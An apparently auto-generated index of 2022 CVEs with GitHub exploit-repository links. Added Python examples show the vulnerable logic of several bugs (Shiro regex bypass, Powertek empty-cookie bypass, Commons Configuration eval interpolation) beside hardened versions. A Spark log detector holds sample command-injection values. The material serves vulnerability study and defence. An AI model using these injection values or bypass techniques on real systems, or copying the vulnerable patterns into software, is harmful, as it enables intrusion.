- [Vikaran101/CVE-2022-31854](https://github.com/Vikaran101/CVE-2022-31854)

### CVE-2022-31889 (2023-04-05)

Cross Site Scripting (XSS) vulnerability in audit/templates/auditlogs.tmpl.php in osTicket osTicket-plugins before commit a7842d494889fd5533d13deb3c6a7789768795ae.

- [reewardius/CVE-2022-31889](https://github.com/reewardius/CVE-2022-31889)

### CVE-2022-31890 (2023-04-05)

SQL Injection vulnerability in audit/class.audit.php in osTicket osTicket-plugins before commit a7842d494889fd5533d13deb3c6a7789768795ae via the order parameter to the getOrder function.

- [reewardius/CVE-2022-31890](https://github.com/reewardius/CVE-2022-31890)

### CVE-2022-31897 (2022-06-29)

SourceCodester Zoo Management System 1.0 is vulnerable to Cross Site Scripting (XSS) via public_html/register_visitor?msg=.

- [angelopioamirante/CVE-2022-31897](https://github.com/angelopioamirante/CVE-2022-31897)

### CVE-2022-31898 (2022-10-27)

gl-inet GL-MT300N-V2 Mango v3.212 and GL-AX1800 Flint v3.214 were discovered to contain multiple command injection vulnerabilities via the ping_addr and trace_addr function parameters.

- [gigaryte/cve-2022-31898](https://github.com/gigaryte/cve-2022-31898)

### CVE-2022-31901 (2023-01-19)

Buffer overflow in function Notepad_plus::addHotSpot in Notepad++ v8.4.3 and earlier allows attackers to crash the application via two crafted files.

- [CDACesec/CVE-2022-31901](https://github.com/CDACesec/CVE-2022-31901)

### CVE-2022-31902 (2023-02-01)

Notepad++ v8.4.1 was discovered to contain a stack overflow via the component Finder::add().

- [CDACesec/CVE-2022-31902](https://github.com/CDACesec/CVE-2022-31902)

### CVE-2022-31983 (2022-06-01)

Online Fire Reporting System v1.0 is vulnerable to SQL Injection via /ofrs/admin/?page=requests/manage_request&id=.

- [mel1huc4r/CVE-2022-31983](https://github.com/mel1huc4r/CVE-2022-31983)

### CVE-2022-32013 (2022-06-02)

Complete Online Job Search System v1.0 is vulnerable to SQL Injection via eris/admin/category/index.php?view=edit&id=.

- [heavenswill/CVE-2022-32013](https://github.com/heavenswill/CVE-2022-32013)

### CVE-2022-32060 (2022-07-07)

An arbitrary file upload vulnerability in the Update Branding Settings component of Snipe-IT v6.0.2 allows attackers to execute arbitrary code via a crafted file.

- [bypazs/CVE-2022-32060](https://github.com/bypazs/CVE-2022-32060)

### CVE-2022-32073 (2022-07-13)

WolfSSH v1.4.7 was discovered to contain an integer overflow via the function wolfSSH_SFTP_RecvRMDIR.

- [mgregus/project_BIT_nmap_script](https://github.com/mgregus/project_BIT_nmap_script)

### CVE-2022-32074 (2022-07-13)

A stored cross-site scripting (XSS) vulnerability in the component audit/class.audit.php of osTicket-plugins - Storage-FS before commit a7842d494889fd5533d13deb3c6a7789768795ae allows attackers to execute arbitrary web scripts or HTML via a crafted SVG file.

- [reewardius/CVE-2022-32074](https://github.com/reewardius/CVE-2022-32074)

### CVE-2022-32114 (2022-07-13)

An unrestricted file upload vulnerability in the Add New Assets function of Strapi 4.1.12 allows attackers to conduct XSS attacks via a crafted PDF file. NOTE: the project documentation suggests that a user with the Media Library "Create (upload)" permission is supposed to be able to upload PDF files containing JavaScript, and that all files in a public assets folder are accessible to the outside world (unless the filename begins with a dot character). The administrator can choose to allow only image, video, and audio files (i.e., not PDF) if desired.

- [bypazs/CVE-2022-32114](https://github.com/bypazs/CVE-2022-32114)
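Where PDF uploads must stay enabled, the workable control is to refuse files that carry active content before they reach a public assets folder. The following added example (not Strapi's code or the linked PoC) scans a PDF for the name tokens that introduce script or auto-trigger behaviour and, because real documents keep most dictionaries in FlateDecode object streams, inflates those streams too. The fixtures built by `build_pdf` are minimal and not renderable documents, and `ACTIVE_NAMES`, `pdf_active_content` and `accept_pdf_upload` are illustrative names.

```python
import re
import zlib

# PDF name tokens that introduce script or auto-trigger behaviour.
ACTIVE_NAMES = (b"/JavaScript", b"/JS", b"/OpenAction", b"/AA", b"/Launch", b"/SubmitForm")
STREAM_RE = re.compile(rb"stream\r?\n(.*?)\r?\nendstream", re.S)


def inflate_streams(data):
    """Yield the inflated content of every stream that is valid zlib data (FlateDecode),
    so names hidden inside compressed object streams are scanned as well."""
    for m in STREAM_RE.finditer(data):
        try:
            out = zlib.decompressobj().decompress(m.group(1))  # tolerant of a clipped last byte
        except zlib.error:
            continue  # not a Flate stream (image data, literal text, ...)
        if out:
            yield out


def pdf_active_content(data, inflate=True):
    """Return the sorted list of active-content names found in a PDF, or a header complaint."""
    if not data.startswith(b"%PDF-"):
        return ["not a PDF (missing %PDF- header)"]
    chunks = [data]
    if inflate:
        chunks.extend(inflate_streams(data))
    found = set()
    for chunk in chunks:
        for name in ACTIVE_NAMES:
            # A name ends at whitespace or a delimiter, so /JSX or /AAA do not count as hits.
            if re.search(re.escape(name) + rb"(?=[\s/<>\[\]()])", chunk):
                found.add(name.decode())
    return sorted(found)


def accept_pdf_upload(data):
    """Upload-time policy: a PDF may go into a public assets folder only if it carries no active content."""
    findings = pdf_active_content(data)
    return (True, "ok") if not findings else (False, "rejected: " + ", ".join(findings))


# Constructed fixtures (minimal, not renderable documents).
JS_ACTION = b"<< /S /JavaScript /JS (app.alert(1)) >>"
BENIGN_PDF = (b"%PDF-1.4\n"
              b"1 0 obj << /Type /Catalog /Pages 2 0 R >> endobj\n"
              b"2 0 obj << /Type /Pages /Kids [] /Count 0 >> endobj\n"
              b"trailer << /Root 1 0 R >>\n%%EOF\n")


def build_pdf(js_compressed):
    """A catalog whose OpenAction runs JavaScript; with js_compressed=True the action dictionary
    sits inside a FlateDecode object stream, so only the /OpenAction name is visible in plaintext."""
    if js_compressed:
        body = zlib.compress(b"4 0 " + JS_ACTION)
        action_obj = (b"3 0 obj << /Type /ObjStm /N 1 /First 4 /Length " + str(len(body)).encode()
                      + b" /Filter /FlateDecode >>\nstream\n" + body + b"\nendstream\nendobj\n")
    else:
        action_obj = b"4 0 obj " + JS_ACTION + b" endobj\n"
    return (b"%PDF-1.7\n"
            b"1 0 obj << /Type /Catalog /Pages 2 0 R /OpenAction 4 0 R >> endobj\n"
            b"2 0 obj << /Type /Pages /Kids [] /Count 0 >> endobj\n"
            + action_obj +
            b"trailer << /Root 1 0 R >>\n%%EOF\n")


if __name__ == "__main__":
    print(accept_pdf_upload(BENIGN_PDF))
    print(accept_pdf_upload(build_pdf(js_compressed=False)))
    print(accept_pdf_upload(build_pdf(js_compressed=True)))
```

This is a name-token heuristic, not a PDF parser: it does not follow cross-reference tables, decode encrypted documents, or handle filters other than Flate, so a determined uploader can still get past it. The robust policy, which the Strapi documentation quoted above also points at, is to keep PDFs out of the public asset allow-list altogether.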

### CVE-2022-32118 (2022-07-15)

Arox School ERP Pro v1.0 was discovered to contain a cross-site scripting (XSS) vulnerability via the dispatchcategory parameter in backoffice.inc.php.

- [JC175/CVE-2022-32118](https://github.com/JC175/CVE-2022-32118)

### CVE-2022-32119 (2022-07-15)

Arox School ERP Pro v1.0 was discovered to contain multiple arbitrary file upload vulnerabilities via the Add Photo function at photogalleries.inc.php and the import staff excel function at 1finance_master.inc.php.

- [JC175/CVE-2022-32119](https://github.com/JC175/CVE-2022-32119)

### CVE-2022-32132
- [reewardius/CVE-2022-32132](https://github.com/reewardius/CVE-2022-32132)

### CVE-2022-32199 (2023-03-27)

db_convert.php in ScriptCase through 9.9.008 is vulnerable to Arbitrary File Deletion by an admin via a directory traversal sequence in the file parameter.

- [Toxich4/CVE-2022-32199](https://github.com/Toxich4/CVE-2022-32199)

### CVE-2022-32223 (2022-07-14)

Node.js is vulnerable to Hijack Execution Flow: DLL Hijacking under certain conditions on Windows platforms. This vulnerability can be exploited if the victim has the following dependencies on a Windows machine: OpenSSL has been installed and "C:\Program Files\Common Files\SSL\openssl.cnf" exists. Whenever the above conditions are present, `node.exe` will search for `providers.dll` in the current user directory. After that, `node.exe` will try to search for `providers.dll` by the DLL Search Order in Windows. It is possible for an attacker to place the malicious file `providers.dll` under a variety of paths and exploit this vulnerability.

- [ianyong/cve-2022-32223](https://github.com/ianyong/cve-2022-32223)

### CVE-2022-32224 (2022-12-05)

A possible escalation to RCE vulnerability exists when using YAML serialized columns in Active Record < 7.0.3.1, <6.1.6.1, <6.0.5.1 and <5.2.8.1 which could allow an attacker, that can manipulate data in the database (via means like SQL injection), the ability to escalate to an RCE.

- [ooooooo-q/cve-2022-32224-rails](https://github.com/ooooooo-q/cve-2022-32224-rails)

### CVE-2022-32250 (2022-06-02)

net/netfilter/nf_tables_api.c in the Linux kernel through 5.18.1 allows a local user (able to create user/net namespaces) to escalate privileges to root because an incorrect NFT_STATEFUL_EXPR check leads to a use-after-free.

- [theori-io/CVE-2022-32250-exploit](https://github.com/theori-io/CVE-2022-32250-exploit)
- [ysanatomic/CVE-2022-32250-LPE](https://github.com/ysanatomic/CVE-2022-32250-LPE)
- [Decstor5/2022-32250LPE](https://github.com/Decstor5/2022-32250LPE)
- [Kristal-g/CVE-2022-32250](https://github.com/Kristal-g/CVE-2022-32250)

### CVE-2022-32532 (2022-06-28)

In Apache Shiro before 1.9.1, a RegexRequestMatcher can be misconfigured to be bypassed on some servlet containers. Applications using RegExPatternMatcher with `.` in the regular expression are possibly vulnerable to an authorization bypass.

- [Lay0us/CVE-2022-32532](https://github.com/Lay0us/CVE-2022-32532)
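The misconfiguration is a regex-engine default: compiled without DOTALL, `.` stops at a line terminator, so a chain rule such as `/admin/.*` never matches a request whose decoded path contains `%0a`, and on a container that decodes the path before Shiro sees it the request reaches the servlet with no filter applied. The following added example (not Shiro's code or the linked PoC) reproduces the matching logic with Python's `re`, which shares the same default, beside the DOTALL form that 1.9.1 adopted; `RULES`, `decide`, `match_vulnerable`, `match_fixed` and `has_control_chars` are illustrative names.

```python
import re
from urllib.parse import unquote

# Constructed filter chain in the style of a Shiro configuration: first matching rule wins.
RULES = [
    ("/admin/.*", "authc"),    # the '.' in '.*' is the hazard the advisory describes
    ("/public/.*", "anon"),
]
UNFILTERED = "no rule matched: request reaches the servlet unfiltered"


def match_vulnerable(pattern, path):
    """Shiro before 1.9.1: the regex is compiled with default flags, so '.' stops at a newline."""
    return re.fullmatch(pattern, path) is not None


def match_fixed(pattern, path):
    """Shiro 1.9.1: the regex is compiled with DOTALL, so '.' also spans line terminators."""
    return re.fullmatch(pattern, path, re.DOTALL) is not None


def decide(raw_request_path, matcher):
    """Decode the path the way a servlet container would, then pick the first matching rule."""
    path = unquote(raw_request_path)
    for pattern, filter_name in RULES:
        if matcher(pattern, path):
            return filter_name
    return UNFILTERED


def has_control_chars(path):
    """Defence in depth that does not depend on regex flags: refuse paths with control characters."""
    return any(ord(c) < 0x20 or c == "\x7f" for c in path)


if __name__ == "__main__":
    for raw in ("/admin/users", "/admin/%0ausers"):
        print(repr(raw), "vulnerable:", decide(raw, match_vulnerable), "| fixed:", decide(raw, match_fixed))
```

Java's `.` also excludes `\r` and the Unicode line separators, so the same rule fails for more than `%0a` there; rejecting control characters before matching, as `has_control_chars` does, closes the class rather than the one encoding.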

### CVE-2022-32548 (2022-08-29)

An issue was discovered on certain DrayTek Vigor routers before July 2022 such as the Vigor3910 before 4.3.1.1. /cgi-bin/wlogin.cgi has a buffer overflow via the username or password to the aa or ab field.

- [MosaedH/CVE-2022-32548-RCE-POC](https://github.com/MosaedH/CVE-2022-32548-RCE-POC)

### CVE-2022-32832 (2022-09-23)

The issue was addressed with improved memory handling. This issue is fixed in iOS 15.6 and iPadOS 15.6, macOS Big Sur 11.6.8, watchOS 8.7, tvOS 15.6, macOS Monterey 12.5, Security Update 2022-005 Catalina. An app with root privileges may be able to execute arbitrary code with kernel privileges.

- [Muirey03/CVE-2022-32832](https://github.com/Muirey03/CVE-2022-32832)
- [AkbarTrilaksana/CVE-2022-32832](https://github.com/AkbarTrilaksana/CVE-2022-32832)

### CVE-2022-32862 (2022-11-01)

This issue was addressed with improved data protection. This issue is fixed in macOS Big Sur 11.7.1, macOS Ventura 13, macOS Monterey 12.6.1. An app with root privileges may be able to access private information.

- [rohitc33/CVE-2022-32862](https://github.com/rohitc33/CVE-2022-32862)

### CVE-2022-32883 (2022-09-20)

A logic issue was addressed with improved restrictions. This issue is fixed in macOS Monterey 12.6, iOS 15.7 and iPadOS 15.7, iOS 16, macOS Big Sur 11.7. An app may be able to read sensitive location information.

- [breakpointHQ/CVE-2022-32883](https://github.com/breakpointHQ/CVE-2022-32883)

### CVE-2022-32898 (2022-11-01)

The issue was addressed with improved memory handling. This issue is fixed in iOS 15.7 and iPadOS 15.7, iOS 16, macOS Ventura 13, watchOS 9. An app may be able to execute arbitrary code with kernel privileges.

- [ox1111/CVE-2022-32898](https://github.com/ox1111/CVE-2022-32898)

### CVE-2022-32932 (2022-11-01)

The issue was addressed with improved memory handling. This issue is fixed in iOS 15.7.1 and iPadOS 15.7.1, iOS 16.1 and iPadOS 16, watchOS 9.1. An app may be able to execute arbitrary code with kernel privileges.

- [ox1111/CVE-2022-32932](https://github.com/ox1111/CVE-2022-32932)

### CVE-2022-32947 (2022-11-01)

The issue was addressed with improved memory handling. This issue is fixed in iOS 16.1 and iPadOS 16, macOS Ventura 13, watchOS 9.1. An app may be able to execute arbitrary code with kernel privileges.

- [asahilina/agx-exploit](https://github.com/asahilina/agx-exploit)

### CVE-2022-32988 (2022-06-30)

Cross Site Scripting (XSS) vulnerability in router Asus DSL-N14U-B1 1.1.2.3_805 via the "*list" parameters (e.g. filter_lwlist, keyword_rulelist, etc.) in every ".asp" page containing a list of stored strings. The following asp files are affected: (1) cgi-bin/APP_Installation.asp, (2) cgi-bin/Advanced_ACL_Content.asp, (3) cgi-bin/Advanced_ADSL_Content.asp, (4) cgi-bin/Advanced_ASUSDDNS_Content.asp, (5) cgi-bin/Advanced_AiDisk_ftp.asp, (6) cgi-bin/Advanced_AiDisk_samba.asp, (7) cgi-bin/Advanced_DSL_Content.asp, (8) cgi-bin/Advanced_Firewall_Content.asp, (9) cgi-bin/Advanced_FirmwareUpgrade_Content.asp, (10) cgi-bin/Advanced_GWStaticRoute_Content.asp, (11) cgi-bin/Advanced_IPTV_Content.asp, (12) cgi-bin/Advanced_IPv6_Content.asp, (13) cgi-bin/Advanced_KeywordFilter_Content.asp, (14) cgi-bin/Advanced_LAN_Content.asp, (15) cgi-bin/Advanced_Modem_Content.asp, (16) cgi-bin/Advanced_PortTrigger_Content.asp, (17) cgi-bin/Advanced_QOSUserPrio_Content.asp, (18) cgi-bin/Advanced_QOSUserRules_Content.asp, (19) cgi-bin/Advanced_SettingBackup_Content.asp, (20) cgi-bin/Advanced_System_Content.asp, (21) cgi-bin/Advanced_URLFilter_Content.asp, (22) cgi-bin/Advanced_VPN_PPTP.asp, (23) cgi-bin/Advanced_VirtualServer_Content.asp, (24) cgi-bin/Advanced_WANPort_Content.asp, (25) cgi-bin/Advanced_WAdvanced_Content.asp, (26) cgi-bin/Advanced_WMode_Content.asp, (27) cgi-bin/Advanced_WWPS_Content.asp, (28) cgi-bin/Advanced_Wireless_Content.asp, (29) cgi-bin/Bandwidth_Limiter.asp, (30) cgi-bin/Guest_network.asp, (31) cgi-bin/Main_AccessLog_Content.asp, (32) cgi-bin/Main_AdslStatus_Content.asp, (33) cgi-bin/Main_Spectrum_Content.asp, (34) cgi-bin/Main_WebHistory_Content.asp, (35) cgi-bin/ParentalControl.asp, (36) cgi-bin/QIS_wizard.asp, (37) cgi-bin/QoS_EZQoS.asp, (38) cgi-bin/aidisk.asp, (39) cgi-bin/aidisk/Aidisk-1.asp, (40) cgi-bin/aidisk/Aidisk-2.asp, (41) cgi-bin/aidisk/Aidisk-3.asp, (42) cgi-bin/aidisk/Aidisk-4.asp, (43) cgi-bin/blocking.asp, (44) cgi-bin/cloud_main.asp, (45) cgi-bin/cloud_router_sync.asp, (46) cgi-bin/cloud_settings.asp, (47) cgi-bin/cloud_sync.asp, (48) cgi-bin/device-map/DSL_dashboard.asp, (49) cgi-bin/device-map/clients.asp, (50) cgi-bin/device-map/disk.asp, (51) cgi-bin/device-map/internet.asp, (52) cgi-bin/error_page.asp, (53) cgi-bin/index.asp, (54) cgi-bin/index2.asp, (55) cgi-bin/qis/QIS_PTM_manual_setting.asp, (56) cgi-bin/qis/QIS_admin_pass.asp, (57) cgi-bin/qis/QIS_annex_setting.asp, (58) cgi-bin/qis/QIS_bridge_cfg_tmp.asp, (59) cgi-bin/qis/QIS_detect.asp, (60) cgi-bin/qis/QIS_finish.asp, (61) cgi-bin/qis/QIS_ipoa_cfg_tmp.asp, (62) cgi-bin/qis/QIS_manual_setting.asp, (63) cgi-bin/qis/QIS_mer_cfg.asp, (64) cgi-bin/qis/QIS_mer_cfg_tmp.asp, (65) cgi-bin/qis/QIS_ppp_cfg.asp, (66) cgi-bin/qis/QIS_ppp_cfg_tmp.asp, (67) cgi-bin/qis/QIS_wireless.asp, (68) cgi-bin/query_wan_status.asp, (69) cgi-bin/query_wan_status2.asp, and (70) cgi-bin/start_apply.asp.

- [FedericoHeichou/CVE-2022-32988](https://github.com/FedericoHeichou/CVE-2022-32988)

### CVE-2022-33075 (2022-07-05)

A stored cross-site scripting (XSS) vulnerability in the Add Classification function of Zoo Management System v1.0 allows attackers to execute arbitrary web scripts or HTML via unspecified vectors.

- [angelopioamirante/CVE-2022-33075](https://github.com/angelopioamirante/CVE-2022-33075)

### CVE-2022-33082 (2022-06-30)

An issue in the AST parser (ast/compile.go) of Open Policy Agent v0.10.2 allows attackers to cause a Denial of Service (DoS) via a crafted input.

- [cyberqueenmeg/cve-2022-33082-exploit](https://github.com/cyberqueenmeg/cve-2022-33082-exploit)

### CVE-2022-33174 (2022-06-13)

Power Distribution Units running on Powertek firmware (multiple brands) before 3.30.30 allow remote authorization bypass in the web interface. To exploit the vulnerability, an attacker sends an HTTP request to the data retrieval interface (/cgi/get_param.cgi) with the tmpToken cookie set to an empty string followed by a semicolon. This bypasses an active session authorization check and can then be used to fetch the values of the protected sys.passwd and sys.su.name fields, which contain the username and password in cleartext.

- [Henry4E36/CVE-2022-33174](https://github.com/Henry4E36/CVE-2022-33174)
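The failure class behind the empty-token bypass, shown as an added example in Python; it is not Powertek firmware code. How the real CGI parses cookies is not documented here, so the vulnerable check (a substring test of the token against the active-session list, the equivalent of a C `strstr(list, token)` that returns non-NULL for an empty token) is a hypothetical reconstruction of the bug class, and the session table is constructed:

```python
"""A session check satisfied by a present-but-empty cookie, beside the
exact-match check that closes it.

Added example, not Powertek firmware code. The vulnerable substring test
is a hypothetical reconstruction of the bug class; the session table and
cookie headers are constructed for the example.
"""

# Constructed session table: token -> user.
ACTIVE_SESSIONS = {"3f9c1a7e": "admin"}


def parse_cookies(cookie_header: str) -> dict:
    """Minimal Cookie-header parser: 'a=1; b=2;' -> {'a': '1', 'b': '2'}."""
    out = {}
    for part in cookie_header.split(";"):
        name, _, value = part.strip().partition("=")
        if name:
            out[name] = value
    return out


def vulnerable_is_authorized(cookie_header: str) -> bool:
    """Substring test against the joined token list.

    '' is a substring of every string, so 'tmpToken=;' passes, exactly as
    strstr(active_list, "") in C returns a non-NULL pointer. A partial
    token also passes, which is a second bug in the same line.
    """
    cookies = parse_cookies(cookie_header)
    if "tmpToken" not in cookies:
        return False
    return cookies["tmpToken"] in ";".join(ACTIVE_SESSIONS)


def hardened_is_authorized(cookie_header: str):
    """Exact lookup of a non-empty token; returns the user or None."""
    token = parse_cookies(cookie_header).get("tmpToken")
    if not token:
        return None
    return ACTIVE_SESSIONS.get(token)


if __name__ == "__main__":
    for header in ("tmpToken=3f9c1a7e", "tmpToken=;", "tmpToken=9c1a", "foo=bar"):
        print(f"{header!r:22} vulnerable={vulnerable_is_authorized(header)!s:5} "
              f"hardened={hardened_is_authorized(header)}")
```

The hardened version also refuses a token that merely prefixes or is contained in a real one; any check that reduces a credential comparison to a substring or prefix test has the same hole.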

### CVE-2022-33679 (2022-09-13)

Windows Kerberos Elevation of Privilege Vulnerability

- [Bdenneu/CVE-2022-33679](https://github.com/Bdenneu/CVE-2022-33679)
- [Blyth0He/CVE-2022-33679](https://github.com/Blyth0He/CVE-2022-33679)
- [Amulab/CVE-2022-33679](https://github.com/Amulab/CVE-2022-33679)
- [notareaperbutDR34P3r/Kerberos_CVE-2022-33679](https://github.com/notareaperbutDR34P3r/Kerberos_CVE-2022-33679)

### CVE-2022-33891 (2022-07-18)

The Apache Spark UI offers the possibility to enable ACLs via the configuration option spark.acls.enable. With an authentication filter, this checks whether a user has access permissions to view or modify the application. If ACLs are enabled, a code path in HttpSecurityFilter can allow someone to perform impersonation by providing an arbitrary user name. A malicious user might then be able to reach a permission check function that will ultimately build a Unix shell command based on their input, and execute it. This will result in arbitrary shell command execution as the user Spark is currently running as. This affects Apache Spark versions 3.0.3 and earlier, versions 3.1.1 to 3.1.2, and versions 3.2.0 to 3.2.1.

- [W01fh4cker/cve-2022-33891](https://github.com/W01fh4cker/cve-2022-33891)
- [HuskyHacks/cve-2022-33891](https://github.com/HuskyHacks/cve-2022-33891)
- [west-wind/CVE-2022-33891](https://github.com/west-wind/CVE-2022-33891)
- [AkbarTrilaksana/cve-2022-33891](https://github.com/AkbarTrilaksana/cve-2022-33891)
- [llraudseppll/cve-2022-33891](https://github.com/llraudseppll/cve-2022-33891)
- [AmoloHT/CVE-2022-33891](https://github.com/AmoloHT/CVE-2022-33891)
- [DrLinuxOfficial/CVE-2022-33891](https://github.com/DrLinuxOfficial/CVE-2022-33891)
- [Vulnmachines/Apache-spark-CVE-2022-33891](https://github.com/Vulnmachines/Apache-spark-CVE-2022-33891)
- [ps-interactive/lab_security_apache_spark_emulation_detection](https://github.com/ps-interactive/lab_security_apache_spark_emulation_detection)
- [elsvital/cve-2022-33891-fix](https://github.com/elsvital/cve-2022-33891-fix)
- [K3ysTr0K3R/CVE-2022-33891-EXPLOIT](https://github.com/K3ysTr0K3R/CVE-2022-33891-EXPLOIT)
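Detection logic for the impersonation-to-shell path described above, as an added example in Python; it is not code from Apache Spark or from any of the listed repositories. It assumes the Spark UI sits behind a proxy that writes combined-format access logs, and it relies on the `doAs` query parameter that Spark's HttpSecurityFilter reads for impersonation (the only detail used here that the description itself does not name). The log lines are constructed:

```python
"""Flag CVE-2022-33891-style requests: a doAs user name carrying shell
metacharacters, which Spark would interpolate into a shell command.

Added example, not Apache Spark code. Assumes combined-format access logs
and the doAs query parameter; the sample log lines are constructed.
"""
import re
from urllib.parse import parse_qs, urlsplit

# Characters that let a "user name" escape into the shell command built
# from it: command substitution, separators, redirection, pipes.
SHELL_META = re.compile(r"[`$;&|<>\n()]")

# What a real principal name should look like; anything else is refused.
VALID_USER = re.compile(r"^[A-Za-z0-9._@-]{1,64}$")

# Combined log format: client ident user [time] "METHOD target PROTO" status size
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]+" (?P<status>\d{3}) \S+'
)


def is_valid_username(name: str) -> bool:
    """Allowlist check a hardened filter would apply before any shell use."""
    return bool(VALID_USER.match(name))


def inspect_line(line: str):
    """Return a finding dict for a suspicious doAs value, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    query = urlsplit(m.group("target")).query
    # parse_qs percent-decodes, so %60id%60 becomes `id` here.
    for user in parse_qs(query, keep_blank_values=True).get("doAs", []):
        if SHELL_META.search(user) or not is_valid_username(user):
            return {
                "client": m.group("client"),
                "time": m.group("time"),
                "doAs": user,
                "status": int(m.group("status")),
            }
    return None


def scan(lines):
    """Scan an iterable of access-log lines; return the list of findings."""
    return [f for f in map(inspect_line, lines) if f]


# Constructed sample log lines (not real traffic).
SAMPLE_LOG = [
    '10.0.0.5 - - [18/Jul/2022:10:00:01 +0000] "GET /jobs/ HTTP/1.1" 200 5120',
    '10.0.0.5 - - [18/Jul/2022:10:00:02 +0000] "GET /?doAs=alice HTTP/1.1" 200 5120',
    '203.0.113.9 - - [18/Jul/2022:10:00:03 +0000] '
    '"GET /?doAs=%60id%60 HTTP/1.1" 403 0',
    '203.0.113.9 - - [18/Jul/2022:10:00:04 +0000] '
    '"GET /?doAs=x%3Bsleep%2010 HTTP/1.1" 403 0',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

Note that the status code is not a useful filter: the injected command runs inside the permission check, so the response to a successful attack is still a 403. The finding keeps the status only for triage.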

### CVE-2022-33980 (2022-07-06)

Apache Commons Configuration performs variable interpolation, allowing properties to be dynamically evaluated and expanded. The standard format for interpolation is "${prefix:name}", where "prefix" is used to locate an instance of org.apache.commons.configuration2.interpol.Lookup that performs the interpolation. Starting with version 2.4 and continuing through 2.7, the set of default Lookup instances included interpolators that could result in arbitrary code execution or contact with remote servers. These lookups are: - "script" - execute expressions using the JVM script execution engine (javax.script) - "dns" - resolve dns records - "url" - load values from urls, including from remote servers Applications using the interpolation defaults in the affected versions may be vulnerable to remote code execution or unintentional contact with remote servers if untrusted configuration values are used. Users are recommended to upgrade to Apache Commons Configuration 2.8.0, which disables the problematic interpolators by default.

- [tangxiaofeng7/CVE-2022-33980-Apache-Commons-Configuration-RCE](https://github.com/tangxiaofeng7/CVE-2022-33980-Apache-Commons-Configuration-RCE)
- [HKirito/CVE-2022-33980](https://github.com/HKirito/CVE-2022-33980)
- [sammwyy/CVE-2022-33980-POC](https://github.com/sammwyy/CVE-2022-33980-POC)
- [P0lar1ght/CVE-2022-33980-POC](https://github.com/P0lar1ght/CVE-2022-33980-POC)
- [joseluisinigo/riskootext4shell](https://github.com/joseluisinigo/riskootext4shell)
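To make the interpolation risk concrete, here is an added Python re-implementation of the `${prefix:name}` lookup pattern; it is not Apache Commons Configuration code. The registry shape and lookup names are assumptions, and Python's `eval` stands in for the JVM script engine that the real "script" lookup used. The point it shows is that the fix is a change to the default lookup table, not to the interpolation syntax:

```python
"""${prefix:name} interpolation with a pre-2.8.0-style default lookup set
(includes 'script') beside a hardened default set.

Added example, not Apache Commons Configuration code. Lookup names, the
registry shape and eval() as a stand-in for javax.script are assumptions.
"""
import os
import re

VAR = re.compile(r"\$\{(?P<prefix>[a-z]+):(?P<name>[^}]*)\}")


class UnknownLookup(Exception):
    """Raised when a value references a prefix that is not registered."""


class Interpolator:
    def __init__(self, lookups):
        # prefix -> callable(name) -> str
        self.lookups = dict(lookups)

    def interpolate(self, value: str) -> str:
        def replace(m):
            prefix, name = m.group("prefix"), m.group("name")
            try:
                lookup = self.lookups[prefix]
            except KeyError:
                raise UnknownLookup(prefix) from None
            return str(lookup(name))
        return VAR.sub(replace, value)


# Safe lookups: no code execution, no network.
CONST = {"app.name": "demo", "app.port": "8080"}
SAFE_LOOKUPS = {
    "env": lambda n: os.environ.get(n, ""),
    "const": lambda n: CONST.get(n, ""),
}

# The 2.4 to 2.7 situation: a script lookup ships in the defaults, so any
# untrusted value can run an expression. eval() is the stand-in sink.
UNSAFE_DEFAULT_LOOKUPS = dict(SAFE_LOOKUPS, script=lambda n: eval(n))


def interpolate_with_defaults(value: str, hardened: bool) -> str:
    """Interpolate using the unsafe (pre-2.8.0 style) or hardened defaults."""
    table = SAFE_LOOKUPS if hardened else UNSAFE_DEFAULT_LOOKUPS
    return Interpolator(table).interpolate(value)


# Constructed untrusted configuration value, e.g. from a user-supplied file.
UNTRUSTED = "port=${const:app.port}; owner=${script:__import__('os').getpid()}"

if __name__ == "__main__":
    print(interpolate_with_defaults(UNTRUSTED, hardened=False))
    try:
        interpolate_with_defaults(UNTRUSTED, hardened=True)
    except UnknownLookup as e:
        print("rejected lookup prefix:", e)
```

With the hardened table an unknown prefix is an error rather than being silently left in place; failing closed is the better choice, because a value that was meant to be interpolated and was not will otherwise surface as a confusing misconfiguration later.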

### CVE-2022-34024 (2022-07-19)

Barangay Management System v1.0 was discovered to contain an arbitrary file upload vulnerability via the resident module editing function at /bmis/pages/resident/resident.php.

- [sorabug/bug_report](https://github.com/sorabug/bug_report)

### CVE-2022-34169 (2022-07-19)

The Apache Xalan Java XSLT library is vulnerable to an integer truncation issue when processing malicious XSLT stylesheets. This can be used to corrupt Java class files generated by the internal XSLTC compiler and execute arbitrary Java bytecode. Users are recommended to update to version 2.7.3 or later. Note: Java runtimes (such as OpenJDK) include repackaged copies of Xalan.

- [bor8/CVE-2022-34169](https://github.com/bor8/CVE-2022-34169)
- [flowerwind/AutoGenerateXalanPayload](https://github.com/flowerwind/AutoGenerateXalanPayload)

### CVE-2022-34265 (2022-07-04)

An issue was discovered in Django 3.2 before 3.2.14 and 4.0 before 4.0.6. The Trunc() and Extract() database functions are subject to SQL injection if untrusted data is used as a kind/lookup_name value. Applications that constrain the lookup name and kind choice to a known safe list are unaffected.

- [aeyesec/CVE-2022-34265](https://github.com/aeyesec/CVE-2022-34265)
- [traumatising/CVE-2022-34265](https://github.com/traumatising/CVE-2022-34265)
- [ZhaoQi99/CVE-2022-34265](https://github.com/ZhaoQi99/CVE-2022-34265)
- [lnwza0x0a/CTF_Django_CVE-2022-34265](https://github.com/lnwza0x0a/CTF_Django_CVE-2022-34265)

### CVE-2022-34298 (2022-06-22)

The NT auth module in OpenAM before 14.6.6 allows a "replace Samba username attack."

- [watchtowrlabs/CVE-2022-34298](https://github.com/watchtowrlabs/CVE-2022-34298)

### CVE-2022-34527 (2022-07-29)

D-Link DSL-3782 v1.03 and below was discovered to contain a command injection vulnerability via the function byte_4C0160.

- [FzBacon/CVE-2022-34527_D-Link_DSL-3782_Router_command_injection](https://github.com/FzBacon/CVE-2022-34527_D-Link_DSL-3782_Router_command_injection)

### CVE-2022-34556 (2022-07-28)

PicoC v3.2.2 was discovered to contain a NULL pointer dereference at variable.c.

- [Halcy0nic/CVE-2022-34556](https://github.com/Halcy0nic/CVE-2022-34556)

### CVE-2022-34683 (2022-12-30)

